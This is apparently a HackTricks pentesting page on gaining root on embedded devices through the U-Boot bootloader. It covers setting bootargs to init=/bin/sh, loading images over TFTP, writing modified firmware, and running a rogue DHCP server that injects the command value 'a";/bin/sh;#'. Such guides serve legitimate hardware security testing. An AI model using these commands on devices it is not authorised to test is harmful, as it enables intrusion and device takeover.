Search K
Appearance
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the ๐ฌ Discord group or the telegram group or follow us on Twitter ๐ฆ @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The following steps are recommended for modifying device startup configurations and bootloaders like U-boot:
Access Bootloader's Interpreter Shell:
- During boot, press "0", space, or other identified "magic codes" to access the bootloader's interpreter shell.
Modify Boot Arguments:
- Execute the following commands to append '
init=/bin/sh' to the boot arguments, allowing execution of a shell command: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
- Execute the following commands to append '
Setup TFTP Server:
- Configure a TFTP server to load images over a local network: %%% #setenv ipaddr 192.168.2.2 #local IP of the device #setenv serverip 192.168.2.1 #TFTP server IP #saveenv #reset #ping 192.168.2.1 #check network access #tftp ${loadaddr} uImage-3.6.35 #loadaddr takes the address to load the file into and the filename of the image on the TFTP server %%%
Utilize
ubootwrite.py:- Use
ubootwrite.pyto write the U-boot image and push a modified firmware to gain root access.
- Use
Check Debug Features:
- Verify if debug features like verbose logging, loading arbitrary kernels, or booting from untrusted sources are enabled.
Cautionary Hardware Interference:
- Be cautious when connecting one pin to ground and interacting with SPI or NAND flash chips during the device boot-up sequence, particularly before the kernel decompresses. Consult the NAND flash chip's datasheet before shorting pins.
Configure Rogue DHCP Server:
- Set up a rogue DHCP server with malicious parameters for a device to ingest during a PXE boot. Utilize tools like Metasploit's (MSF) DHCP auxiliary server. Modify the 'FILENAME' parameter with command injection commands such as
'a";/bin/sh;#'to test input validation for device startup procedures.
- Set up a rogue DHCP server with malicious parameters for a device to ingest during a PXE boot. Utilize tools like Metasploit's (MSF) DHCP auxiliary server. Modify the 'FILENAME' parameter with command injection commands such as
Note: The steps involving physical interaction with device pins (*marked with asterisks) should be approached with extreme caution to avoid damaging the device.
References โ
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the ๐ฌ Discord group or the telegram group or follow us on Twitter ๐ฆ @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.